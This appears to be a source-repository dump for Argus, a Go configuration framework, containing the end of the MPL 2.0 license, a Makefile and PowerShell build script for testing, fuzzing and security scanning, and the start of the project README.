License, and how they can obtain a copy of this License. You may not
attempt to alter or restrict the recipients' rights in the Source Code
Form.

3.2. Distribution of Executable Form

If You distribute Covered Software in Executable Form then:

(a) such Covered Software must also be made available in Source Code
    Form, as described in Section 3.1, and You must inform recipients of
    the Executable Form how they can obtain a copy of such Source Code
    Form by reasonable means in a timely manner, at a charge no more
    than the cost of distribution to the recipient; and

(b) You may distribute such Executable Form under the terms of this
    License, or sublicense it under different terms, provided that the
    license for the Executable Form does not attempt to limit or alter
    the recipients' rights in the Source Code Form under this License.

3.3. Distribution of a Larger Work

You may create and distribute a Larger Work under terms of Your choice,
provided that You also comply with the requirements of this License for
the Covered Software. If the Larger Work is a combination of Covered
Software with a work governed by one or more Secondary Licenses, and the
Covered Software is not Incompatible With Secondary Licenses, this
License permits You to additionally distribute such Covered Software
under the terms of such Secondary License(s), so that the recipient of
the Larger Work may, at their option, further distribute the Covered
Software under the terms of either this License or such Secondary
License(s).

3.4. Notices

You may not remove or alter the substance of any license notices
(including copyright notices, patent notices, disclaimers of warranty,
or limitations of liability) contained within the Source Code Form of
the Covered Software, except that You may alter any license notices to
the extent required to remedy known factual inaccuracies.

3.5. Application of Additional Terms

You may choose to offer, and to charge a fee for, warranty, support,
indemnity or liability obligations to one or more recipients of Covered
Software. However, You may do so only on Your own behalf, and not on
behalf of any Contributor. You must make it absolutely clear that any
such warranty, support, indemnity, or liability obligation is offered by
You alone, and You hereby agree to indemnify every Contributor for any
liability incurred by such Contributor as a result of warranty, support,
indemnity or liability terms You offer. You may include additional
disclaimers of warranty and limitations of liability specific to any
jurisdiction.

4. Inability to Comply Due to Statute or Regulation
---------------------------------------------------

If it is impossible for You to comply with any of the terms of this
License with respect to some or all of the Covered Software due to
statute, judicial order, or regulation then You must: (a) comply with
the terms of this License to the maximum extent possible; and (b)
describe the limitations and the code they affect. Such description must
be placed in a text file included with all distributions of the Covered
Software under this License. Except to the extent prohibited by statute
or regulation, such description must be sufficiently detailed for a
recipient of ordinary skill to be able to understand it.

5. Termination
--------------

5.1. The rights granted under this License will terminate automatically
if You fail to comply with any of its terms. However, if You become
compliant, then the rights granted under this License from a particular
Contributor are reinstated (a) provisionally, unless and until such
Contributor explicitly and finally terminates Your grants, and (b) on an
ongoing basis, if such Contributor fails to notify You of the
non-compliance by some reasonable means prior to 60 days after You have
come back into compliance. Moreover, Your grants from a particular
Contributor are reinstated on an ongoing basis if such Contributor
notifies You of the non-compliance by some reasonable means, this is the
first time You have received notice of non-compliance with this License
from such Contributor, and You become compliant prior to 30 days after
Your receipt of the notice.

5.2. If You initiate litigation against any entity by asserting a patent
infringement claim (excluding declaratory judgment actions,
counter-claims, and cross-claims) alleging that a Contributor Version
directly or indirectly infringes any patent, then the rights granted to
You by any and all Contributors for the Covered Software under Section
2.1 of this License shall terminate.

5.3. In the event of termination under Sections 5.1 or 5.2 above, all
end user license agreements (excluding distributors and resellers) which
have been validly granted by You or Your distributors under this License
prior to termination shall survive termination.

************************************************************************
*                                                                      *
*  6. Disclaimer of Warranty                                           *
*  -------------------------                                           *
*                                                                      *
*  Covered Software is provided under this License on an "as is"       *
*  basis, without warranty of any kind, either expressed, implied, or  *
*  statutory, including, without limitation, warranties that the       *
*  Covered Software is free of defects, merchantable, fit for a        *
*  particular purpose or non-infringing. The entire risk as to the     *
*  quality and performance of the Covered Software is with You.        *
*  Should any Covered Software prove defective in any respect, You     *
*  (not any Contributor) assume the cost of any necessary servicing,   *
*  repair, or correction. This disclaimer of warranty constitutes an   *
*  essential part of this License. No use of any Covered Software is   *
*  authorized under this License except under this disclaimer.         *
*                                                                      *
************************************************************************

************************************************************************
*                                                                      *
*  7. Limitation of Liability                                          *
*  --------------------------                                          *
*                                                                      *
*  Under no circumstances and under no legal theory, whether tort      *
*  (including negligence), contract, or otherwise, shall any           *
*  Contributor, or anyone who distributes Covered Software as          *
*  permitted above, be liable to You for any direct, indirect,         *
*  special, incidental, or consequential damages of any character      *
*  including, without limitation, damages for lost profits, loss of    *
*  goodwill, work stoppage, computer failure or malfunction, or any    *
*  and all other commercial damages or losses, even if such party      *
*  shall have been informed of the possibility of such damages. This   *
*  limitation of liability shall not apply to liability for death or   *
*  personal injury resulting from such party's negligence to the       *
*  extent applicable law prohibits such limitation. Some               *
*  jurisdictions do not allow the exclusion or limitation of           *
*  incidental or consequential damages, so this exclusion and          *
*  limitation may not apply to You.                                    *
*                                                                      *
************************************************************************

8. Litigation
-------------

Any litigation relating to this License may be brought only in the
courts of a jurisdiction where the defendant maintains its principal
place of business and such litigation shall be governed by laws of that
jurisdiction, without reference to its conflict-of-law provisions.
Nothing in this Section shall prevent a party's ability to bring
cross-claims or counter-claims.

9. Miscellaneous
----------------

This License represents the complete agreement concerning the subject
matter hereof. If any provision of this License is held to be
unenforceable, such provision shall be reformed only to the extent
necessary to make it enforceable. Any law or regulation which provides
that the language of a contract shall be construed against the drafter
shall not be used to construe this License against a Contributor.

10. Versions of the License
---------------------------

10.1. New Versions

Mozilla Foundation is the license steward. Except as provided in Section
10.3, no one other than the license steward has the right to modify or
publish new versions of this License. Each version will be given a
distinguishing version number.

10.2. Effect of New Versions

You may distribute the Covered Software under the terms of the version
of the License under which You originally received the Covered Software,
or under the terms of any subsequent version published by the license
steward.

10.3. Modified Versions

If you create software not governed by this License, and you want to
create a new license for such software, you may create and use a
modified version of this License if you rename the license and remove
any references to the name of the license steward (except to note that
such modified license differs from this License).

10.4. Distributing Source Code Form that is Incompatible With Secondary
Licenses

If You choose to distribute Source Code Form that is Incompatible With
Secondary Licenses under the terms of this version of the License, the
notice described in Exhibit B of this License must be attached.

Exhibit A - Source Code Form License Notice
-------------------------------------------

  This Source Code Form is subject to the terms of the Mozilla Public
  License, v. 2.0. If a copy of the MPL was not distributed with this
  file, You can obtain one at http://mozilla.org/MPL/2.0/.

If it is not possible or desirable to put the notice in a particular
file, then You may include the notice in a location (such as a LICENSE
file in a relevant directory) where a recipient would be likely to look
for such a notice.

You may add additional accurate notices of copyright ownership.

Exhibit B - "Incompatible With Secondary Licenses" Notice
---------------------------------------------------------

  This Source Code Form is "Incompatible With Secondary Licenses", as
  defined by the Mozilla Public License, v. 2.0.


## /Makefile

```makefile path="/Makefile"
# Go Makefile - AGILira Standard
# Usage: make help

.PHONY: help test race coverage fmt vet staticcheck errcheck lint gosec security security-fuzz vulncheck mod-verify check check-race deps clean build install bench fuzz fuzz-long fuzz-validate fuzz-parse ci dev pre-commit all tools status
.DEFAULT_GOAL := help

# Variables
BINARY_NAME := $(shell basename $(PWD))
GO_FILES := $(shell find . -type f -name '*.go' -not -path './vendor/*')
TOOLS_DIR := $(HOME)/go/bin

# Colors for output
RED := \033[0;31m
GREEN := \033[0;32m
YELLOW := \033[1;33m
BLUE := \033[0;34m
NC := \033[0m # No Color

help: ## Show this help message
	@echo "$(BLUE)Available targets:$(NC)"
	@grep -E '^[a-zA-Z_-]+:.*## .*$$' $(MAKEFILE_LIST) | awk 'BEGIN {FS = ":.*## "}; {printf "  $(GREEN)%-15s$(NC) %s\n", $$1, $$2}'
	@echo ""
	@echo "$(BLUE)Fuzz Testing Commands:$(NC)"
	@echo "  $(GREEN)fuzz$(NC)            Run fuzz tests (30s each)"
	@echo "  $(GREEN)fuzz-long$(NC)       Run extended fuzz tests (5m each)"
	@echo "  $(GREEN)fuzz-validate$(NC)   Fuzz ValidateSecurePath only"
	@echo "  $(GREEN)fuzz-parse$(NC)      Fuzz ParseConfig only"
	@echo "  $(GREEN)security-fuzz$(NC)   Security checks + fuzz testing"

test: ## Run tests
	@echo "$(YELLOW)Running tests...$(NC)"
	go test -v ./...

race: ## Run tests with race detector
	@echo "$(YELLOW)Running tests with race detector...$(NC)"
	go test -race -v ./...

coverage: ## Run tests with coverage
	@echo "$(YELLOW)Running tests with coverage...$(NC)"
	go test -coverprofile=coverage.out ./...
	go tool cover -html=coverage.out -o coverage.html
	@echo "$(GREEN)Coverage report generated: coverage.html$(NC)"

fmt: ## Format Go code
	@echo "$(YELLOW)Formatting Go code...$(NC)"
	go fmt ./...

vet: ## Run go vet
	@echo "$(YELLOW)Running go vet...$(NC)"
	go vet ./...

staticcheck: ## Run staticcheck
	@echo "$(YELLOW)Running staticcheck...$(NC)"
	@if [ ! -f "$(TOOLS_DIR)/staticcheck" ]; then \
		echo "$(RED)staticcheck not found. Run 'make tools' to install.$(NC)"; \
		exit 1; \
	fi
	$(TOOLS_DIR)/staticcheck ./...

errcheck: ## Run errcheck
	@echo "$(YELLOW)Running errcheck...$(NC)"
	@if [ ! -f "$(TOOLS_DIR)/errcheck" ]; then \
		echo "$(RED)errcheck not found. Run 'make tools' to install.$(NC)"; \
		exit 1; \
	fi
	$(TOOLS_DIR)/errcheck ./...

gosec: ## Run gosec security scanner
	@echo "$(YELLOW)Running gosec security scanner...$(NC)"
	@if [ ! -f "$(TOOLS_DIR)/gosec" ]; then \
		echo "$(RED)gosec not found. Run 'make tools' to install.$(NC)"; \
		exit 1; \
	fi
	@$(TOOLS_DIR)/gosec ./... || (echo "$(YELLOW)  gosec completed with warnings (may be import-related)$(NC)" && exit 0)

vulncheck: ## Run govulncheck vulnerability scanner
	@echo "$(YELLOW)Running govulncheck...$(NC)"
	@if [ ! -f "$(TOOLS_DIR)/govulncheck" ]; then \
		echo "$(RED)govulncheck not found. Run 'make tools' to install.$(NC)"; \
		exit 1; \
	fi
	$(TOOLS_DIR)/govulncheck ./...

mod-verify: ## Verify module dependencies
	@echo "$(YELLOW)Running go mod verify...$(NC)"
	go mod verify
	@echo "$(GREEN)Module verification passed.$(NC)"

lint: staticcheck errcheck ## Run all linters
	@echo "$(GREEN)All linters completed.$(NC)"

security: gosec ## Run security checks
	@echo "$(GREEN)Security checks completed.$(NC)"

security-fuzz: gosec fuzz ## Run security checks including fuzz testing
	@echo "$(GREEN)Security checks with fuzz testing completed.$(NC)"

check: mod-verify fmt vet lint security vulncheck test ## Run all checks (format, vet, lint, security, test)
	@echo "$(GREEN)All checks passed!$(NC)"

check-race: mod-verify fmt vet lint security vulncheck race ## Run all checks including race detector
	@echo "$(GREEN)All checks with race detection passed!$(NC)"

tools: ## Install development tools
	@echo "$(YELLOW)Installing development tools...$(NC)"
	go install honnef.co/go/tools/cmd/staticcheck@latest
	go install github.com/kisielk/errcheck@latest
	go install github.com/securego/gosec/v2/cmd/gosec@latest
	go install golang.org/x/vuln/cmd/govulncheck@latest
	@echo "$(GREEN)Tools installed successfully!$(NC)"

deps: ## Download and verify dependencies
	@echo "$(YELLOW)Downloading dependencies...$(NC)"
	go mod download
	go mod verify
	go mod tidy

clean: ## Clean build artifacts and test cache
	@echo "$(YELLOW)Cleaning...$(NC)"
	go clean
	go clean -testcache
	rm -f coverage.out coverage.html
	rm -f $(BINARY_NAME)

build: ## Build the binary
	@echo "$(YELLOW)Building $(BINARY_NAME)...$(NC)"
	go build -ldflags="-w -s" -o $(BINARY_NAME) .

install: ## Install the binary to $GOPATH/bin
	@echo "$(YELLOW)Installing $(BINARY_NAME)...$(NC)"
	go install .

bench: ## Run benchmarks
	@echo "$(YELLOW)Running benchmarks...$(NC)"
	go test -bench=. -benchmem ./...

fuzz: ## Run fuzz tests for security critical functions
	@echo "$(YELLOW)Running fuzz tests...$(NC)"
	@echo "$(BLUE)Fuzzing ValidateSecurePath for 30 seconds...$(NC)"
	go test -fuzz=FuzzValidateSecurePath -fuzztime=30s
	@echo "$(BLUE)Fuzzing ParseConfig for 30 seconds...$(NC)"
	go test -fuzz=FuzzParseConfig -fuzztime=30s
	@echo "$(GREEN)Fuzz testing completed!$(NC)"

fuzz-long: ## Run extended fuzz tests (5 minutes each)
	@echo "$(YELLOW)Running extended fuzz tests...$(NC)"
	@echo "$(BLUE)Fuzzing ValidateSecurePath for 5 minutes...$(NC)"
	go test -fuzz=FuzzValidateSecurePath -fuzztime=5m
	@echo "$(BLUE)Fuzzing ParseConfig for 5 minutes...$(NC)"
	go test -fuzz=FuzzParseConfig -fuzztime=5m
	@echo "$(GREEN)Extended fuzz testing completed!$(NC)"

fuzz-validate: ## Run fuzz test for ValidateSecurePath only
	@echo "$(YELLOW)Fuzzing ValidateSecurePath...$(NC)"
	go test -fuzz=FuzzValidateSecurePath -fuzztime=1m

fuzz-parse: ## Run fuzz test for ParseConfig only
	@echo "$(YELLOW)Fuzzing ParseConfig...$(NC)"
	go test -fuzz=FuzzParseConfig -fuzztime=1m

ci: ## Run CI checks (used in GitHub Actions)
	@echo "$(BLUE)Running CI checks...$(NC)"
	@make fmt vet lint security test coverage
	@echo "$(GREEN)CI checks completed successfully!$(NC)"

dev: ## Quick development check (fast feedback loop)
	@echo "$(BLUE)Running development checks...$(NC)"
	@make fmt vet test
	@echo "$(GREEN)Development checks completed!$(NC)"

pre-commit: check ## Run pre-commit checks (alias for 'check')

all: clean tools deps check build ## Run everything from scratch

# Show tool status
status: ## Show status of installed tools
	@echo "$(BLUE)Development tools status:$(NC)"
	@echo -n "staticcheck: "; [ -f "$(TOOLS_DIR)/staticcheck" ] && echo "$(GREEN)✓ installed$(NC)" || echo "$(RED)✗ missing$(NC)"
	@echo -n "errcheck:    "; [ -f "$(TOOLS_DIR)/errcheck" ] && echo "$(GREEN)✓ installed$(NC)" || echo "$(RED)✗ missing$(NC)"
	@echo -n "gosec:       "; [ -f "$(TOOLS_DIR)/gosec" ] && echo "$(GREEN)✓ installed$(NC)" || echo "$(RED)✗ missing$(NC)"
	@echo -n "govulncheck: "; [ -f "$(TOOLS_DIR)/govulncheck" ] && echo "$(GREEN)✓ installed$(NC)" || echo "$(RED)✗ missing$(NC)"
```
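The self-documenting `help` target depends on the `target: ## description` comment convention used throughout the Makefile: a grep/awk pipeline scans the file and turns each annotated rule into an aligned "name  description" row. A minimal sketch of that extraction, run against a small sample file rather than the real Makefile:

```shell
# Sample Makefile fragment using the '## ' annotation convention
cat > /tmp/sample.mk <<'EOF'
test: ## Run tests
race: ## Run tests with race detector
build: ## Build the binary
EOF

# Keep only annotated rules, then split each line on ':...## '
# into the target name ($1) and its description ($2).
grep -E '^[a-zA-Z_-]+:.*## ' /tmp/sample.mk | \
  awk 'BEGIN {FS = ":.*## "}; {printf "  %-15s %s\n", $1, $2}'
```

Inside a Makefile recipe the `$1`/`$2` awk fields must be written `$$1`/`$$2` so make does not expand them, and the color variables (`$(GREEN)`, `$(NC)`) are interpolated into the printf format string.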

## /Makefile.ps1

```ps1 path="/Makefile.ps1" 
# PowerShell Build Script - AGILira Standard
# Windows equivalent of Makefile for Go development
# Usage: .\Makefile.ps1 [command]
# Example: .\Makefile.ps1 help

param(
    [Parameter(Position=0)]
    [string]$Command = "help"
)

# Variables
$BinaryName = Split-Path -Leaf (Get-Location)
$ToolsDir = if ($env:GOPATH) { "$env:GOPATH\bin" } else { "$env:USERPROFILE\go\bin" }

# Colors for output
$Red = "Red"
$Green = "Green" 
$Yellow = "Yellow"
$Blue = "Cyan"

function Write-ColorOutput {
    param($Message, $Color = "White")
    Write-Host $Message -ForegroundColor $Color
}

function Test-ToolExists {
    param($ToolName)
    $toolPath = Join-Path $ToolsDir "$ToolName.exe"
    return Test-Path $toolPath
}

function Invoke-Help {
    Write-ColorOutput "Available commands:" $Blue
    Write-ColorOutput "  help          Show this help message" $Green
    Write-ColorOutput "  test          Run tests" $Green
    Write-ColorOutput "  race          Run tests with race detector" $Green
    Write-ColorOutput "  coverage      Run tests with coverage" $Green
    Write-ColorOutput "  fmt           Format Go code" $Green
    Write-ColorOutput "  vet           Run go vet" $Green
    Write-ColorOutput "  staticcheck   Run staticcheck" $Green
    Write-ColorOutput "  errcheck      Run errcheck" $Green
    Write-ColorOutput "  gosec         Run gosec security scanner" $Green
    Write-ColorOutput "  vulncheck     Run govulncheck vulnerability scanner" $Green
    Write-ColorOutput "  mod-verify    Verify module dependencies" $Green
    Write-ColorOutput "  lint          Run all linters" $Green
    Write-ColorOutput "  security      Run security checks" $Green
    Write-ColorOutput "  check         Run all checks (format, vet, lint, security, test)" $Green
    Write-ColorOutput "  check-race    Run all checks including race detector" $Green
    Write-ColorOutput "  tools         Install development tools" $Green
    Write-ColorOutput "  deps          Download and verify dependencies" $Green
    Write-ColorOutput "  clean         Clean build artifacts and test cache" $Green
    Write-ColorOutput "  build         Build the binary" $Green
    Write-ColorOutput "  install       Install the binary to GOPATH/bin" $Green
    Write-ColorOutput "  bench         Run benchmarks" $Green
    Write-ColorOutput "  ci            Run CI checks" $Green
    Write-ColorOutput "  dev           Quick development check" $Green
    Write-ColorOutput "  pre-commit    Run pre-commit checks (alias for 'check')" $Green
    Write-ColorOutput "  all           Run everything from scratch" $Green
    Write-ColorOutput "  status        Show status of installed tools" $Green
    Write-ColorOutput "" 
    Write-ColorOutput "Fuzz Testing Commands:" $Blue
    Write-ColorOutput "  fuzz          Run fuzz tests (30s each)" $Green
    Write-ColorOutput "  fuzz-long     Run extended fuzz tests (5m each)" $Green
    Write-ColorOutput "  fuzz-validate Fuzz ValidateSecurePath only" $Green
    Write-ColorOutput "  fuzz-parse    Fuzz ParseConfig only" $Green
    Write-ColorOutput "  security-fuzz Security checks + fuzz testing" $Green
}

function Invoke-Test {
    Write-ColorOutput "Running tests..." $Yellow
    go test -v "./..."
    if ($LASTEXITCODE -ne 0) { exit $LASTEXITCODE }
}

function Invoke-Race {
    Write-ColorOutput "Running tests with race detector..." $Yellow
    go test -race -v "./..."
    if ($LASTEXITCODE -ne 0) { exit $LASTEXITCODE }
}

function Invoke-Coverage {
    Write-ColorOutput "Running tests with coverage..." $Yellow
    $testArgs = @("-coverprofile=coverage.out", "./...")
    go test @testArgs
    if ($LASTEXITCODE -eq 0) {
        $coverArgs = @("-html=coverage.out", "-o", "coverage.html")
        go tool cover @coverArgs
        Write-ColorOutput "Coverage report generated: coverage.html" $Green
    }
}

function Invoke-Fmt {
    Write-ColorOutput "Formatting Go code..." $Yellow
    go fmt "./..."
}

function Invoke-Vet {
    Write-ColorOutput "Running go vet..." $Yellow
    go vet "./..."
    if ($LASTEXITCODE -ne 0) { exit $LASTEXITCODE }
}

function Invoke-StaticCheck {
    Write-ColorOutput "Running staticcheck..." $Yellow
    if (-not (Test-ToolExists "staticcheck")) {
        Write-ColorOutput "staticcheck not found. Run '.\Makefile.ps1 tools' to install." $Red
        exit 1
    }
    & "$ToolsDir\staticcheck.exe" "./..."
    if ($LASTEXITCODE -ne 0) { exit $LASTEXITCODE }
}

function Invoke-ErrCheck {
    Write-ColorOutput "Running errcheck..." $Yellow
    if (-not (Test-ToolExists "errcheck")) {
        Write-ColorOutput "errcheck not found. Run '.\Makefile.ps1 tools' to install." $Red
        exit 1
    }
    & "$ToolsDir\errcheck.exe" "./..."
    if ($LASTEXITCODE -ne 0) { exit $LASTEXITCODE }
}

function Invoke-GoSec {
    Write-ColorOutput "Running gosec security scanner..." $Yellow
    if (-not (Test-ToolExists "gosec")) {
        Write-ColorOutput "gosec not found. Run '.\Makefile.ps1 tools' to install." $Red
        exit 1
    }
    & "$ToolsDir\gosec.exe" "./..."
    if ($LASTEXITCODE -ne 0) {
        Write-ColorOutput "⚠️  gosec completed with warnings (may be import-related)" $Yellow
    }
}

function Invoke-Lint {
    Invoke-StaticCheck
    Invoke-ErrCheck
    Write-ColorOutput "All linters completed." $Green
}

function Invoke-Security {
    Invoke-GoSec
    Write-ColorOutput "Security checks completed." $Green
}

function Invoke-Vulncheck {
    Write-ColorOutput "Running govulncheck..." $Yellow
    if (-not (Test-ToolExists "govulncheck")) {
        Write-ColorOutput "govulncheck not found. Run '.\Makefile.ps1 tools' to install." $Red
        exit 1
    }
    & "$ToolsDir\govulncheck.exe" "./..."
    if ($LASTEXITCODE -ne 0) { exit $LASTEXITCODE }
}

function Invoke-ModVerify {
    Write-ColorOutput "Running go mod verify..." $Yellow
    go mod verify
    if ($LASTEXITCODE -ne 0) { 
        Write-ColorOutput "Module verification failed!" $Red
        exit $LASTEXITCODE 
    }
    Write-ColorOutput "Module verification passed." $Green
}

function Invoke-SecurityFuzz {
    Invoke-GoSec
    Invoke-Fuzz
    Write-ColorOutput "Security checks with fuzz testing completed." $Green
}

function Invoke-Check {
    Invoke-ModVerify
    Invoke-Fmt
    Invoke-Vet
    Invoke-Lint
    Invoke-Security
    Invoke-Vulncheck
    Invoke-Test
    Write-ColorOutput "All checks passed!" $Green
}

function Invoke-CheckRace {
    Invoke-ModVerify
    Invoke-Fmt
    Invoke-Vet
    Invoke-Lint
    Invoke-Security
    Invoke-Vulncheck
    Invoke-Race
    Write-ColorOutput "All checks with race detection passed!" $Green
}

function Invoke-Tools {
    Write-ColorOutput "Installing development tools..." $Yellow
    go install honnef.co/go/tools/cmd/staticcheck@latest
    if ($LASTEXITCODE -ne 0) { exit $LASTEXITCODE }
    
    go install github.com/kisielk/errcheck@latest
    if ($LASTEXITCODE -ne 0) { exit $LASTEXITCODE }
    
    go install github.com/securego/gosec/v2/cmd/gosec@latest
    if ($LASTEXITCODE -ne 0) { exit $LASTEXITCODE }
    
    go install golang.org/x/vuln/cmd/govulncheck@latest
    if ($LASTEXITCODE -ne 0) { exit $LASTEXITCODE }
    
    Write-ColorOutput "Tools installed successfully!" $Green
}

function Invoke-Deps {
    Write-ColorOutput "Downloading dependencies..." $Yellow
    go mod download
    if ($LASTEXITCODE -ne 0) { exit $LASTEXITCODE }
    
    go mod verify
    if ($LASTEXITCODE -ne 0) { exit $LASTEXITCODE }
    
    go mod tidy
    if ($LASTEXITCODE -ne 0) { exit $LASTEXITCODE }
}

function Invoke-Clean {
    Write-ColorOutput "Cleaning..." $Yellow
    go clean
    go clean -testcache
    if (Test-Path "coverage.out") { Remove-Item "coverage.out" }
    if (Test-Path "coverage.html") { Remove-Item "coverage.html" }
    if (Test-Path "$BinaryName.exe") { Remove-Item "$BinaryName.exe" }
}

function Invoke-Build {
    Write-ColorOutput "Building $BinaryName..." $Yellow
    go build -ldflags="-w -s" -o "$BinaryName.exe" .
    if ($LASTEXITCODE -ne 0) { exit $LASTEXITCODE }
}

function Invoke-Install {
    Write-ColorOutput "Installing $BinaryName..." $Yellow
    go install .
    if ($LASTEXITCODE -ne 0) { exit $LASTEXITCODE }
}

function Invoke-Bench {
    Write-ColorOutput "Running benchmarks..." $Yellow
    go test -bench=. -benchmem "./..."
    if ($LASTEXITCODE -ne 0) { exit $LASTEXITCODE }
}

function Invoke-Fuzz {
    Write-ColorOutput "Running fuzz tests..." $Yellow
    Write-ColorOutput "Fuzzing ValidateSecurePath for 30 seconds..." $Blue
    go test -fuzz=FuzzValidateSecurePath -fuzztime=30s
    if ($LASTEXITCODE -ne 0) { exit $LASTEXITCODE }
    
    Write-ColorOutput "Fuzzing ParseConfig for 30 seconds..." $Blue
    go test -fuzz=FuzzParseConfig -fuzztime=30s
    if ($LASTEXITCODE -ne 0) { exit $LASTEXITCODE }
    
    Write-ColorOutput "Fuzz testing completed!" $Green
}

function Invoke-FuzzLong {
    Write-ColorOutput "Running extended fuzz tests..." $Yellow
    Write-ColorOutput "Fuzzing ValidateSecurePath for 5 minutes..." $Blue
    go test -fuzz=FuzzValidateSecurePath -fuzztime=5m
    if ($LASTEXITCODE -ne 0) { exit $LASTEXITCODE }
    
    Write-ColorOutput "Fuzzing ParseConfig for 5 minutes..." $Blue
    go test -fuzz=FuzzParseConfig -fuzztime=5m
    if ($LASTEXITCODE -ne 0) { exit $LASTEXITCODE }
    
    Write-ColorOutput "Extended fuzz testing completed!" $Green
}

function Invoke-FuzzValidate {
    Write-ColorOutput "Fuzzing ValidateSecurePath..." $Yellow
    go test -fuzz=FuzzValidateSecurePath -fuzztime=1m
    if ($LASTEXITCODE -ne 0) { exit $LASTEXITCODE }
}

function Invoke-FuzzParse {
    Write-ColorOutput "Fuzzing ParseConfig..." $Yellow
    go test -fuzz=FuzzParseConfig -fuzztime=1m
    if ($LASTEXITCODE -ne 0) { exit $LASTEXITCODE }
}

function Invoke-CI {
    Write-ColorOutput "Running CI checks..." $Blue
    Invoke-Fmt
    Invoke-Vet
    Invoke-Lint
    Invoke-Security
    Invoke-Test
    Invoke-Coverage
    Write-ColorOutput "CI checks completed successfully!" $Green
}

function Invoke-Dev {
    Write-ColorOutput "Running development checks..." $Blue
    Invoke-Fmt
    Invoke-Vet
    Invoke-Test
    Write-ColorOutput "Development checks completed!" $Green
}

function Invoke-All {
    Invoke-Clean
    Invoke-Tools
    Invoke-Deps
    Invoke-Check
    Invoke-Build
}

function Invoke-Status {
    Write-ColorOutput "Development tools status:" $Blue
    
    $staticcheckStatus = if (Test-ToolExists "staticcheck") { "✓ installed" } else { "✗ missing" }
    $staticcheckColor = if (Test-ToolExists "staticcheck") { $Green } else { $Red }
    Write-Host "staticcheck: " -NoNewline
    Write-ColorOutput $staticcheckStatus $staticcheckColor
    
    $errcheckStatus = if (Test-ToolExists "errcheck") { "✓ installed" } else { "✗ missing" }
    $errcheckColor = if (Test-ToolExists "errcheck") { $Green } else { $Red }
    Write-Host "errcheck:    " -NoNewline
    Write-ColorOutput $errcheckStatus $errcheckColor
    
    $gosecStatus = if (Test-ToolExists "gosec") { "✓ installed" } else { "✗ missing" }
    $gosecColor = if (Test-ToolExists "gosec") { $Green } else { $Red }
    Write-Host "gosec:       " -NoNewline
    Write-ColorOutput $gosecStatus $gosecColor
    
    $govulncheckStatus = if (Test-ToolExists "govulncheck") { "✓ installed" } else { "✗ missing" }
    $govulncheckColor = if (Test-ToolExists "govulncheck") { $Green } else { $Red }
    Write-Host "govulncheck: " -NoNewline
    Write-ColorOutput $govulncheckStatus $govulncheckColor
}

# Main execution
switch ($Command.ToLower()) {
    "help" { Invoke-Help }
    "test" { Invoke-Test }
    "race" { Invoke-Race }
    "coverage" { Invoke-Coverage }
    "fmt" { Invoke-Fmt }
    "vet" { Invoke-Vet }
    "staticcheck" { Invoke-StaticCheck }
    "errcheck" { Invoke-ErrCheck }
    "gosec" { Invoke-GoSec }
    "vulncheck" { Invoke-Vulncheck }
    "mod-verify" { Invoke-ModVerify }
    "lint" { Invoke-Lint }
    "security" { Invoke-Security }
    "check" { Invoke-Check }
    "check-race" { Invoke-CheckRace }
    "tools" { Invoke-Tools }
    "deps" { Invoke-Deps }
    "clean" { Invoke-Clean }
    "build" { Invoke-Build }
    "install" { Invoke-Install }
    "bench" { Invoke-Bench }
    "fuzz" { Invoke-Fuzz }
    "fuzz-long" { Invoke-FuzzLong }
    "fuzz-validate" { Invoke-FuzzValidate }
    "fuzz-parse" { Invoke-FuzzParse }
    "security-fuzz" { Invoke-SecurityFuzz }
    "ci" { Invoke-CI }
    "dev" { Invoke-Dev }
    "pre-commit" { Invoke-Check }
    "all" { Invoke-All }
    "status" { Invoke-Status }
    default {
        Write-ColorOutput "Unknown command: $Command" $Red
        Write-ColorOutput "Run '.\Makefile.ps1 help' for available commands." $Yellow
        exit 1
    }
}
```

## /README.md

# Argus: Dynamic Configuration Framework for Go

![Argus Banner](assets/banner.png)

High-performance configuration management framework for Go applications with zero-allocation performance, universal format support (JSON, YAML, TOML, HCL, INI, Properties), and an ultra-fast CLI powered by [Orpheus](https://github.com/agilira/orpheus).

[![CI/CD Pipeline](https://github.com/agilira/argus/actions/workflows/ci.yml/badge.svg)](https://github.com/agilira/argus/actions/workflows/ci.yml)
[![CodeQL](https://github.com/agilira/argus/actions/workflows/codeql.yml/badge.svg)](https://github.com/agilira/argus/actions/workflows/codeql.yml)
[![Security](https://img.shields.io/badge/security-gosec-brightgreen.svg)](https://github.com/agilira/argus/actions/workflows/ci.yml)
[![Go Report Card](https://goreportcard.com/badge/github.com/agilira/argus?v=2)](https://goreportcard.com/report/github.com/agilira/argus)
[![Test Coverage](https://img.shields.io/badge/coverage-87.7%25-brightgreen)](https://github.com/agilira/argus)
[![CLI Coverage](https://img.shields.io/badge/cli_coverage-77.5%25-green)](https://github.com/agilira/argus)
![Xantos Powered](https://img.shields.io/badge/Xantos-Powered-8A2BE2)
[![OpenSSF Best Practices](https://www.bestpractices.dev/projects/11273/badge)](https://www.bestpractices.dev/projects/11273)
[![Mentioned in Awesome Go](https://awesome.re/mentioned-badge.svg)](https://github.com/avelino/awesome-go)

## Live Demo

<div align="center">

See Argus in action - managing configurations across multiple formats with zero-allocation performance:

<picture>
  <source media="(max-width: 768px)" srcset="https://asciinema.org/a/Ew5Br2N5UD7rDe1F6MFVfNYrL.svg" width="100%">
  <source media="(max-width: 1024px)" srcset="https://asciinema.org/a/Ew5Br2N5UD7rDe1F6MFVfNYrL.svg" width="90%">
  <img src="https://asciinema.org/a/Ew5Br2N5UD7rDe1F6MFVfNYrL.svg" alt="Argus CLI Demo" style="max-width: 100%; height: auto;" width="800">
</picture>

*[Click to view interactive demo](https://asciinema.org/a/Ew5Br2N5UD7rDe1F6MFVfNYrL)*

</div>

**[Installation](#installation) • [Quick Start](#quick-start) • [Performance](#performance) • [Architecture](#architecture) • [Framework](#core-framework) • [Observability](#observability--integrations) • [Philosophy](#the-philosophy-behind-argus) • [Documentation](#documentation)**


### Features

- **Universal Format Support**: JSON, YAML, TOML, HCL, INI, Properties with auto-detection
- **ConfigWriter System**: Atomic configuration file updates with type-safe operations
- **Ultra-Fast CLI**: [Orpheus](https://github.com/agilira/orpheus)-powered CLI
- **Professional Grade Validation**: With detailed error reporting & performance recommendations
- **Security Hardened**: [Red-team tested](argus_security_test.go) against path traversal, injection, DoS and resource exhaustion attacks
- **Fuzz Tested**: [Comprehensive fuzzing](argus_fuzz_test.go) for ValidateSecurePath and ParseConfig edge cases
- **Zero-Allocation Design**: Pre-allocated buffers eliminate GC pressure in hot paths
